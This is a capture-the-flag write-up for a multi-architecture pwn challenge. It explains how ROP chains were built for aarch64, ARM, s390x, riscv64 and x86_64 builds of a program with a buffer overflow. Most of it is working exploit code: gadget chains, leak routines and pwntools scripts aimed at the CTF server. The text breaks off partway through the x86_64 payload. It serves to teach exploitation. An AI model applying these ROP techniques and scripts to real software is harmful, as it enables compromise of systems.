I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.

Category: pwn

Solver: nh1729

Flag: GPNCTF{you_re_lucky_that_i_scr4pped_one_arch_11dda4}

Writeup

Challenge Setup

This is the hard version of polyrop-warmup. To summarize:

It is a binary exploitation challenge. We get the source of the target program, composer.c, and a Python wrapper, composer.py. The program prints a menu that lets us either echo back a line or exit. It has been compiled for five different architectures: s390x, aarch64, arm, riscv64 and x86_64.

$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-arm'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-riscv64'
    Arch:     riscv64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-s390x'
    Arch:     em_s390-64-big
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-x86_64'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

The wrapper starts a QEMU instance with the executable for each architecture, each under a different user. Every line we send is multiplexed to all of these processes. The wrapper then waits until every process has produced some output, prints these outputs and accepts new input.

QEMU loads all binaries except the one for aarch64 at static addresses, despite them being PIE.

The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.

Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us.

In contrast to polyrop-warmup, there is no win function. We have to do proper ROP this time.

Recall there is a buffer overflow in the function that echoes back a user provided line:

static void add_composer(void) {
    char buf[0x20];
    puts("enter composer:");
    int i = 0, c;
    while ((c = xgetchar()) != '\n') {
        buf[i++] = c;
    }
    fputs("composer: ", stdout);
    puts(buf);
    // TODO: add composer to db
}

The while loop behaves almost exactly like the unsafe gets function, except that xgetchar is a custom function that exits on EOF.
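To make the bug concrete, here is a minimal Python model of the loop, not the real binary. The frame layout (a 0x20-byte buffer with a saved return address at offset 0x28) is an assumption chosen for illustration; the actual offset differs per architecture.

```python
import struct

BUF_SIZE = 0x20      # size of buf in add_composer
RET_OFFSET = 0x28    # hypothetical offset of a saved return address


def add_composer_model(frame: bytearray, line: bytes) -> None:
    """Copy bytes into the frame until a newline, like the while loop does."""
    i = 0
    for c in line:
        if c == ord("\n"):
            break
        frame[i] = c  # no check against BUF_SIZE: this is the overflow
        i += 1


frame = bytearray(0x40)
# A made-up legitimate return address sitting behind the buffer.
struct.pack_into("<Q", frame, RET_OFFSET, 0x1111111111111111)

payload = b"A" * RET_OFFSET + struct.pack("<Q", 0xDEADBEEF) + b"\n"
add_composer_model(frame, payload)

(overwritten,) = struct.unpack_from("<Q", frame, RET_OFFSET)
print(hex(overwritten))
```

The only byte we cannot place is the newline itself, which is why the exploit scripts below assert that no payload contains b'\n'.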

Solution

We started with our exploit for polyrop-warmup. Since we need to build proper ROP chains this time, we debug each architecture individually. For that, we patch the list of architectures in composer.py and our exploit to include only one and enable gdb debugging in composer.py.

We can debug the architecture now by running gdb-multiarch with the command

target remote localhost:1234

The first architecture we tackled was aarch64.

aarch64

Architecture basics: This architecture keeps the return address not on the stack but in register x30, the link register. Only a function that calls other functions, and thus clobbers x30, saves it on the stack. The stack pointer is sp, while x29 is the frame pointer.

First, we automatically search for gadgets and dump all assembly with

ROPgadget --binary composer-aarch64 --offset 0x100000 > gadgets-aarch64.txt # offset is the one Ghidra uses
aarch64-linux-gnu-objdump -d composer-aarch64  > disassembly-aarch64.txt # more searchable than Ghidra 

The objdump command is from the binutils-aarch64-linux-gnu package.

We can see that the binary is statically linked against musl as its libc. We therefore did not need to leak further addresses to reach juicy gadgets there. Instead, we looked for somewhat high-level gadgets to increase the chances of reuse on other architectures.

To read from file descriptor 42, our first attempt was to reuse add_composer: by redirecting the pointer it writes through to the address of the file descriptor in the stdin struct, we could input the byte 42 ('*') to change the file descriptor. Subsequently, the function would read the token from the new file descriptor.

First, we needed to leak the address of the binary. This is only required for aarch64 due to QEMU. Easy enough, we copied that from our exploit for polyrop-warmup.
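The leak boils down to two small steps, sketched below with the standard library only. The two reference addresses are the ones from the exploit in this writeup; the echoed line and the 0x1000 shift are made up for the example, and the helper names are hypothetical.

```python
def parse_leak(echo: bytes, pad_len: int, prefix: bytes = b"composer: ") -> int:
    """Extract the little-endian pointer that puts() printed after the padding."""
    raw = echo[len(prefix) + pad_len:-1]  # drop prefix, padding and trailing newline
    return int.from_bytes(raw, "little")


def rebase(leak: int, ref_leak: int, ref_target: int) -> int:
    """Translate an address seen in one debugging session to the current run."""
    return leak - ref_leak + ref_target


# Reference values observed once in gdb (taken from the exploit script).
REF_LEAK = 0x7F112A8B6D44
REF_MAIN = 0x7F112A8B69E4

# Hypothetical echo from a run where the binary was loaded 0x1000 bytes higher.
leaked_ptr = REF_LEAK + 0x1000
echo = b"composer: " + b"A" * 0x28 + leaked_ptr.to_bytes(8, "little").rstrip(b"\0") + b"\n"

main_addr = rebase(parse_leak(echo, 0x28), REF_LEAK, REF_MAIN)
print(hex(main_addr))
```

Because puts stops at the first NUL byte, only the low non-zero bytes of the pointer are echoed, which is enough for a little-endian value.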

This approach failed, however, because add_composer calls exit on EOF. We could thus not return to any gadget to print the data.

The next approach was to use other gadgets to change the file descriptor and read from it as discrete operations. Using some regexes on the output of ROPgadget, we found these gadgets:

# loads w0 and x19 from the stack
<__uflow + 0x34>: ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret

# stores the value of w0 to an address relative to x19
<__do_global_dtors_aux + 0x50>: strb w0, [x19, #1072]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #32; ret

To find the required payload offsets for register values and subsequent return addresses, we ran the program with the payload filled with a cyclic pattern (the default filler), stepped through the execution until we reached the gadgets and, just like with the return addresses, looked up the register values in the cyclic pattern to get their offsets.
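The offset lookup can be sketched without pwntools. The generator below is a plain de Bruijn sequence over lowercase letters, similar in spirit to what pwntools' cyclic and cyclic_find provide; the function names and the example offset 0x70 are only illustrative.

```python
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence in which every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the sequence."""
    return bytes(islice(de_bruijn(b"abcdefghijklmnopqrstuvwxyz", n), length))


def find_offset(value: int, length: int = 0x500, n: int = 4) -> int:
    """Return the payload offset whose bytes ended up in a little-endian register."""
    needle = (value & (256**n - 1)).to_bytes(n, "little")
    return pattern(length, n).find(needle)


# Pretend a gadget loaded x19 from payload offset 0x70 and we read it in gdb.
x19 = int.from_bytes(pattern(0x500)[0x70:0x78], "little")
print(hex(find_offset(x19)))
```

For a big-endian target such as s390x, the needle would have to be built with "big" instead.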

aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

# pwndbg> p &__stdin_FILE.fd
# $3 = (int *) 0x7f112a8d82c0 <__stdin_FILE+120>
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

payload = flat({
    # Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19
    0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19
}, length=0x500, word_size=64, endian='little', filler=cyclic())

With print __stdin_FILE, we confirmed the fd was changed.

We cannot use add_composer to read from that file descriptor because it would exit again. Therefore, we tried to find gadgets to explicitly call getchar and store the result in some buffer to print later. Unfortunately, getchar on this architecture does not seem to store its return address on the stack.

If we return to it by setting register x30, the ret at the end of the function jumps back to its start, trapping us in an infinite loop of getchar with no option to output our precious tokens. We would rather have a gadget that does a proper function call to an address held in a register, so that x30 is set up properly. Searching for these with the regex \tb.*\tx, we found an even better one:

// __libc_start_init + 0x2c
// Start of interesting bit
ldr	x0, [x19], #8
blr	x0
cmp	x19, x20
b.cc	10cf0 // Jump to start of this gadget
// End of interesting bit
ldp	x19, x20, [sp, #16]
ldp	x29, x30, [sp], #32
ret

The interesting bit loops from x19 to x20 and calls each address in that array as a function. Extremely interesting, as we know we can set up x19 easily (and x20 is not much harder). This single gadget lets us build a “ROP”-chain that does not actually use the return address register x30 to set up the gadgets. Instead, we can simply create an array of addresses to be called. Some of these functions would be getchar, while others would store the return value in w0 to a chosen buffer. While searching for such a gadget, we realized it might not be necessary at all because the characters read in getchar would also appear in the input buffer of __stdin_FILE.
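The behaviour of this loop can be modelled in a few lines of Python. This is only a sketch: the two function addresses are hypothetical stand-ins, and the stack base and array offset are the empirical values used in this writeup. In the real chain the second entry continues inside main and never returns to the loop.

```python
import struct


def call_array_loop(memory: bytes, base: int, x19: int, x20: int, functions: dict) -> list:
    """Model `ldr x0,[x19],#8; blr x0; cmp x19,x20; b.cc loop`."""
    trace = []
    while True:
        (target,) = struct.unpack_from("<Q", memory, x19 - base)  # ldr x0, [x19], #8
        x19 += 8
        trace.append(functions[target]())                         # blr x0
        if not x19 < x20:                                          # cmp x19, x20; b.cc
            break
    return trace


# Hypothetical addresses standing in for getchar and main+0xa8.
GETCHAR, PUTS_GADGET = 0x1000, 0x2000
functions = {GETCHAR: lambda: "getchar", PUTS_GADGET: lambda: "puts(x22)"}

STACK_BASE = 0x4000007FF150   # empirical value from the writeup
ARRAY_OFFSET = 0xB0

stack = bytearray(0x100)
struct.pack_into("<QQ", stack, ARRAY_OFFSET, GETCHAR, PUTS_GADGET)

trace = call_array_loop(
    bytes(stack), STACK_BASE,
    x19=STACK_BASE + ARRAY_OFFSET,
    x20=STACK_BASE + ARRAY_OFFSET + 0x10,
    functions=functions,
)
print(trace)
```

Since we enter the gadget at the ldr, the body runs at least once, even if x19 and x20 are equal.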

# Address start of payload
aarch_stack_base = 0x4000007ff150 # Empirical
aarch_array_offset = 0xb0

payload = flat({
# Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19

    # Fetch token and print it.
    0x68: aarch_exe.symbols['main'] - 0x44, # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
    0xa0: aarch_stack_base + aarch_array_offset, # value for x19: start of list of functions
    0x50: aarch_stack_base + aarch_array_offset + 0x10, # value for x20: end of list of functions
    0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin

    0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

    aarch_array_offset: [aarch_exe.symbols['getchar']] * 16, # functions to execute: read token
}, length=0x500, word_size=64, endian='little', filler=cyclic())

Stepping through the exploit, we found that the first getchar already reads the entire token into __stdin_FILE.buf. We therefore do not need to call it 16 times. Making 16 calls would be fine and safer at this point, but it bloats our payload by occupying a large range of offsets. That could complicate things further down the line, when all payloads must be non-overlapping so that we can combine them into the final payload. So one getchar it is.

The next step is to print __stdin_FILE.buf. Luckily, we found a gadget in main that calls puts on the buffer pointed to by register x22:

// main+0xa8
mov	x0, x22
b	10a5c <main+0x78>
// instruction after jump:
bl	11718 <puts>

main restores x22 from the stack when returning, giving us full control over it.

The entire exploit for aarch64 is this:

from pwn import *
from ast import literal_eval

archs = ["aarch64"]
r = process('python ./composer.py', shell=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out
read_response(r)
r.sendline(b'1')
read_response(r)
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

# Address start of payload
aarch_stack_base = 0x4000007ff150 # Empirical
aarch_array_offset = 0xb0

payload = flat({
    # Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19
    0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19 (anonymous function)

    # Fetch token
    0xa0: aarch_stack_base + aarch_array_offset, # value for x19: start of list of functions
    0x50: aarch_stack_base + aarch_array_offset + 0x10, # value for x20: end of list of functions
    0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin.
    0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

    aarch_array_offset: [aarch_exe.symbols['getchar'], aarch_exe.symbols['main'] + 0xa8], # functions to execute: prefetch token, go to main for puts
}, length=0x500, word_size=64, endian='little', filler=cyclic())

assert b'\n' not in payload

# send payload
r.sendline(b'1')
read_response(r)
r.sendline(payload)
read_response(r)

# return from main to trigger chain
r.sendline(b'2')
r.interactive()

We can see the token is being printed, together with more garbage from the payload that is still in the buffer.

$ python aarch64_wu.py 
[+] Starting local process '/bin/sh': pid 1284212
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Switching to interactive mode
aarch64: b'e4e4da8d190bb079kaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaam\n'

Other architectures

Once we had one payload figured out, the others were a lot easier, as many similar gadgets are available in the same functions. In this section, we only point out notable features, techniques and gadgets for these architectures and do not cover every detail again. You’ll see in the final exploit script that there is a lot of approximate repetition.

On all architectures, we have the strategy to change __stdin_FILE.fd, call getchar and print __stdin_FILE.buf. Since the payloads are conceptually all the same, we only list them in the final, complete exploit script.

ARM

For arm, ROPgadget found only 61 gadgets, so the disassembly from objdump was much more useful. Unlike aarch64, the arm binary pops the return address from the stack. The syntax is slightly unusual: a single instruction, ldmia.w (or its alias pop), restores many registers at the end of a function, including the program counter as if it were a regular register. This is the return instruction at the end of main:

pop	{r4, r5, r6, r7, r8, r9, fp, pc}

Working on this architecture, we found this gadget to set the fd, where ld* loads from an address with an offset and st* stores:

// __fwritex+0x70
ldr	r3, [r5, #20]
add	r3, r4
str	r3, [r5, #20]
ldmia.w	sp!, {r4, r5, r6, r7, r8, pc}

Not only does it change a value relative to r5 by r4, it also ends in an ldmia that sets both of them! In the end we had them set by the return from main, but this gadget is still really powerful, as the function is likely to use callee-saved registers on other architectures too.
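Because the gadget adds rather than stores, it relies on the current value of the field. A small model shows the effect, assuming the field starts at 0 because stdin is file descriptor 0. The address is arm_stdin_fd from the exploit script; the memory window and function name are made up for the example.

```python
import struct

FD_DISPLACEMENT = 20   # the gadget accesses [r5, #20]


def fwritex_gadget(memory: bytearray, base: int, r4: int, r5: int) -> None:
    """Model `ldr r3,[r5,#20]; add r3,r4; str r3,[r5,#20]` on 32-bit words."""
    addr = r5 + FD_DISPLACEMENT - base
    (r3,) = struct.unpack_from("<I", memory, addr)
    r3 = (r3 + r4) & 0xFFFFFFFF
    struct.pack_into("<I", memory, addr, r3)


# Hypothetical memory window around the fd field; stdin starts out as fd 0.
BASE = 0x431D00
STDIN_FD = 0x431D6C    # arm_stdin_fd from the exploit script
memory = bytearray(0x100)

fwritex_gadget(memory, BASE, r4=42, r5=STDIN_FD - FD_DISPLACEMENT)
(new_fd,) = struct.unpack_from("<I", memory, STDIN_FD - BASE)
print(new_fd)
```

This is why the payload sets r5 to the address of fd minus 0x14 and r4 to 42.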

The remainder of the payload for arm is almost identical to that of aarch64. We again used libc_start_init to call getchar and a puts from main, although classical ROP could have been sufficient as the return address is on the stack.

s390x

ROPgadget and Ghidra do not support this architecture, but objdump works fine. The return address is in register r14 and the stack pointer in r15; all values are big endian. The return address is not always saved on the stack. Other than that, we pretty much used the same gadgets as on arm. Popping from the stack is really cursed on this architecture. Most functions end with lmg (LOAD MULTIPLE). According to the manual, this instruction loads the consecutive range of registers from its first operand through its second from memory at the address given by the third. It took us some attempts to understand this, so here is an example:

lmg	%r12,%r15,288(%r15)
// This instruction effectively means:
r12 = *(r15+288+8*0)
r13 = *(r15+288+8*1)
r14 = *(r15+288+8*2)
r15 = *(r15+288+8*3)
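The same semantics as a small Python model, restricted to the case where the first register number is not larger than the last. The stack contents and addresses are made up; the point to notice is that the address is taken from the old r15 before r15 itself is overwritten by the last load.

```python
import struct


def lmg(regs: dict, memory: bytes, mem_base: int,
        first: int, last: int, disp: int, base_reg: int) -> None:
    """Model `lmg %r<first>,%r<last>,disp(%r<base_reg>)` for first <= last."""
    addr = regs[base_reg] + disp   # computed once, before any register is loaded
    for n, reg in enumerate(range(first, last + 1)):
        (regs[reg],) = struct.unpack_from(">Q", memory, addr - mem_base + 8 * n)


# Hypothetical stack at 0x10000 holding four attacker-controlled values.
STACK = 0x10000
memory = bytearray(0x200)
struct.pack_into(">QQQQ", memory, 288, 0xAAAA, 0xBBBB, 0x2AA00001234, 0x10400)

regs = {12: 0, 13: 0, 14: 0, 15: STACK}
lmg(regs, bytes(memory), STACK, first=12, last=15, disp=288, base_reg=15)
print({r: hex(v) for r, v in regs.items()})
```

A following br %r14 would then jump to the loaded r14 with the stack pointer already pivoted to the loaded r15.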

The only notable differences to the arm gadgets are these: for the gadget in __fwritex, we only use the store part because we can control the value to be stored directly; and we set up the first argument register directly and return to puts via the second element of the array of functions.

riscv64

The return address is stored on the stack. The gadgets are the same as in arm.

X86_64

We are comfortable enough with this architecture to pop rax and rbx directly and use a simple mov %eax,0x20(%rbx); add $0x10,%rsp; pop %rbx; ret gadget to set fd. All other essential gadgets are called through plain stack-based return addresses, without the need for the libc_start_init array.

Putting it all together

Now that we had five payloads that each worked on their respective architecture, we still had to combine them into a single payload that solves all of them at the same time. For that, the ROP chains must not overlap. We therefore chose simple gadgets that add some value to the stack pointer (or, in the case of s390x, pop it directly) to move the actual chain of each architecture further back until it no longer collides with the other payloads.

These shifts are the ${ARCH}_rop_offset variables in the exploit below.
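As a rough sketch of how such a shift is laid out, the helper below places several copies of a stack-advancing gadget and then the real chain, using only the standard library. The numbers 0x28, 0x60 and 7 are the aarch64 values from the exploit; the gadget addresses and the helper name are hypothetical.

```python
import struct


def shifted_chain(first_ret: int, stride: int, jumps: int,
                  skip_gadget: int, chain: dict) -> bytes:
    """Place `jumps` copies of a stack-advancing gadget, then the real chain."""
    rop_offset = stride * jumps
    layout = {first_ret + stride * i: skip_gadget for i in range(jumps)}
    layout.update({rop_offset + off: value for off, value in chain.items()})

    payload = bytearray(max(layout) + 8)   # zero filled, like filler=b'\0'
    for off, value in layout.items():
        struct.pack_into("<Q", payload, off, value)
    return bytes(payload)


SKIP = 0x1111        # hypothetical address of an "add 0x60 to sp; ret" gadget
FIRST_REAL = 0x2222  # hypothetical first gadget of the actual chain

payload = shifted_chain(first_ret=0x28, stride=0x60, jumps=7,
                        skip_gadget=SKIP, chain={0x28: FIRST_REAL})
print(hex(len(payload)))
```

Each skip gadget consumes one stride of stack, so the real chain sees the same relative offsets as in the single-architecture exploit, just moved by stride times jumps.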

We used this snippet to merge the payloads, gather tokens and find the flag. We fill the finished payloads with null bytes and consider a byte relevant to a payload if it is not null.


##########################
##### Merge Payloads #####
##########################

payloads = [
    ('arm', payload_arm),
    ('aarch64', payload_aarch64),
    ('riscv', payload_riscv),
    ('x86_64', payload_x86_64),
    ('s390x', payload_s390x),
]

def key(name_payload):
    return len(name_payload[1])

maxlen = key(max(payloads, key=key))

for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'

merged_payload = [0] * maxlen

for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and  payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!')
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]

for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))

merged_payload = bytes(merged_payload)

###################
##### Exploit #####
###################

r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()
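The merge rule itself can be tried in isolation. The following is a compact standalone variant, not the exact code above: it takes a dict of toy payloads and raises on the first collision. The function name and the sample byte strings are made up.

```python
def merge_payloads(payloads: dict) -> bytes:
    """Overlay zero-filled payloads; a non-zero byte claims its offset."""
    merged = bytearray(max(len(p) for p in payloads.values()))
    owner = {}
    for name, payload in payloads.items():
        for i, byte in enumerate(payload):
            if byte == 0:
                continue
            if i in owner:
                raise ValueError(f"{owner[i]} and {name} overlap at {i:#x}")
            owner[i] = name
            merged[i] = byte
    return bytes(merged)


merged = merge_payloads({
    "a": b"\x00\x00AA",
    "b": b"BB\x00\x00\x00C",
})
print(merged)
```

One caveat of treating zero as "unused": a zero byte that one payload actually needs, such as the high bytes of an address, is only safe as long as no other payload claims that offset, and this check does not detect that case.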

One final hiccup was that the stack addresses are randomized on the remote instance, while they were constant locally. We fixed that by extending the leaks at the beginning of the exploit to also recover the stack addresses.
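The extended leak reads the stack one byte per request. The sketch below replaces the remote service with a local model of the echo, so the stack contents and helper names are assumptions; the recovery rule (a newline at the probed position means a NUL byte) is the one used in the exploit.

```python
def echo_model(stack: bytes, n: int) -> bytes:
    """Model the echo: n padding bytes overwrite the stack, puts stops at NUL."""
    visible = b"A" * n + stack[n:]
    visible = visible.split(b"\0", 1)[0]
    return b"composer: " + visible + b"\n"


def leak_stack(stack: bytes, start: int, end: int) -> bytes:
    """Recover stack[start:end] one byte per request."""
    prefix_len = len(b"composer: ")
    out = bytearray()
    for i in range(start, end):
        byte = echo_model(stack, i)[prefix_len + i:][:1]
        out += b"\0" if byte == b"\n" else byte
    return bytes(out)


# Hypothetical stack: 0x20 bytes of buffer, a saved pointer, a return address.
stack = (bytes(0x20)
         + (0x4000007FF1B0).to_bytes(8, "little")
         + (0x7F112A8B6D44).to_bytes(8, "little"))

leaked = leak_stack(stack, 0x20, 0x30)
print(hex(int.from_bytes(leaked[:8], "little")))
```

A genuine 0x0a byte on the stack is indistinguishable from a NUL with this rule, so a leak containing one would come out wrong.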

Exploit

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = remote("imagine--john-lennon-5061.ctf.kitctf.de", "443", ssl=True)


def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

######### Begin Leak test

# Leak test
# print(read_response(r))
# for i in range(0x10, 0x70, 4):
#     print(f'##### {i=:x} #####')
#     r.sendline(b'1')
#     read_response(r)
#     r.sendline(b'A' * i)
#     print(read_response(r)['s390x'])
# r.interactive()

######### End Leak test

leaks = {a: bytes(0x20) for a in archs}
len_composer = len(b'composer: ')

read_response(r)

with log.progress("Leaking bytes") as prog:
    for i in range(0x20, 0x70):
        prog.status(f'{i=} / {0x70}')
        r.sendline(b'1')
        read_response(r)
        r.sendline(b'A' * i)
        leaks_ = read_response(r)
        for arch, leak in leaks_.items():
            leak_byte = leak[len_composer+i:][:1]
            if leak_byte == b'\n':
                leaks[arch] += b'\0'
            else:
                leaks[arch] += leak_byte

s390x_stack_base = int.from_bytes(leaks['s390x'][0x68:0x68 + 8].rstrip(b'\n'), 'big') - 0x210
aarch_stack_base = int.from_bytes(leaks['aarch64'][0x20:0x20 + 8].rstrip(b'\n'), 'little') - 0x60
arm_stack_base = int.from_bytes(leaks['arm'][0x24:0x24 + 4].rstrip(b'\n'), 'little') - 0x74
riscv64_stack_base = int.from_bytes(leaks['riscv64'][0x58: 0x58 + 8].rstrip(b'\n'), 'little') - 0xb0

# We do not need a leak for x86_64
success(f'{s390x_stack_base:=x}, {aarch_stack_base:=x}, {arm_stack_base:=x}, {riscv64_stack_base:=x}')

###################
##### AARCH64 #####
###################

aarch_leak = int.from_bytes(leaks['aarch64'][0x28:0x30], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

aarch_offset_jumps = 7
aarch_rop_offset = 0x60 * aarch_offset_jumps

# Offset of function array from buffer start
aarch_array_offset = 0xb0

payload_aarch64 = flat({
    # gdb: b *main+0xfc

    # add 0x60 to sp per iteration
    **{
        0x28 + 0x60 * i: aarch_exe.sym['main'] + 0xe4 for i in range(aarch_offset_jumps)
    },

    aarch_rop_offset: {
        # Change fd of stdin to 42
        # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
        0x28: aarch_exe.sym['__uflow'] + 0x34,
        0x60+0x2f: bytes([42]), # value for w0
        0x70: aarch_stdin_fd - 0x430, # value for x19

        # Fetch token and puts it.
        # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
        0x68: aarch_exe.symbols['main'] - 0x44,
        # value for x19: start of list of functions
        0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset,
        # value for x20: end of list of functions
        0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10,
        0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin

        0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

        aarch_array_offset: [
            aarch_exe.symbols['getchar'], # prefetch token
            aarch_exe.symbols['main'] + 0xa8, # puts( x22 )
        ],
    }
}, word_size=64, endian='little', filler=b'\0')

###############
##### ARM #####
###############

arm_exe = ELF('./composer-arm')
arm_exe.address = 0x400000

arm_array_offset = 0x0
arm_stdin_fd = 0x431d6c
arm_stdin_buf = 0x431fac
arm_offset_jumps = 3
arm_rop_offset = 0xc8 * arm_offset_jumps

payload_arm = flat({
    # gdb: b *main+0xdc
    **{
        0x3c + 0xc8 * i: arm_exe.sym['__init_libc'] + 0x11e for i in range(arm_offset_jumps)
    },
    arm_rop_offset: {
        0x2c: 42, # R4
        0x30: arm_stdin_fd - 0x14, # R5
        # 0x28: 0, # R6
        # 0x2c: 0, # R7
        # 0x30: 0, # R8
        # 0x34: 0, # R9
        # 0x38: 0, # R11
        # pc # ldr r3, [r5, #20]; add r3, r4; str r3, [r5, #20]; ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
        0x3c: arm_exe.sym['__fwritex'] + 0x70,

        0x40: arm_rop_offset + arm_array_offset + arm_stack_base, # R4, start of function array
        0x44: arm_rop_offset + arm_array_offset + arm_stack_base + 4 * 2, # R5, end of function array
        # 0x48: 0, # R6
        # 0x4c: 0, # R7
        0x50: arm_stdin_buf, # R8, stdin buffer
        0x54: arm_exe.sym['libc_start_init'] + 0x14, # pc # call function array

        arm_array_offset: [
            arm_exe.sym['getchar'], # prefetch token
            arm_exe.sym['main'] + 0xa4, # puts( R8 )
        ],
    },
}, word_size=32, endian='little', filler=b'\0')

##################
##### x86_64 #####
##################

x86_64_exe = ELF('./composer-x86_64')
x86_64_exe.address = 0x555555556000
x86_64_stdin_fd = 0x55555555ab78
x86_64_stdin_buf = 0x55555555afa8 # same address as the r15 value used in the payload below
x86_64_offset_jumps = 3
x86_64_rop_offset = 0x160 * x86_64_offset_jumps

pop_rax = x86_64_exe.sym['_init'] + 1
pop_rbx = x86_64_exe.sym['__init_tp'] + 0x78
# 0x0000000000101e14 : mov dword ptr [rbx + 0x20], eax ; add rsp, 0x10 ; pop rbx ; ret
mov_gadget = x86_64_exe.sym['static_init_tls'] + 0x1cd

payload_x86_64 = flat({
    # gdb: b *main + 0xe7
    **{
        # add rsp, 0x158 ; ret
        0x58 + 0x160 * i: x86_64_exe.sym['__init_libc'] + 0x199 for i in range(x86_64_offset_jumps)
    },
    0x48: 0x55555555afa8, # r15: stdin buffer
    x86_64_rop_offset + 0x58: [
        pop_rax,
        42, # RAX
        pop_rbx,
        x86_64_stdin_fd - 0x20, # rbx
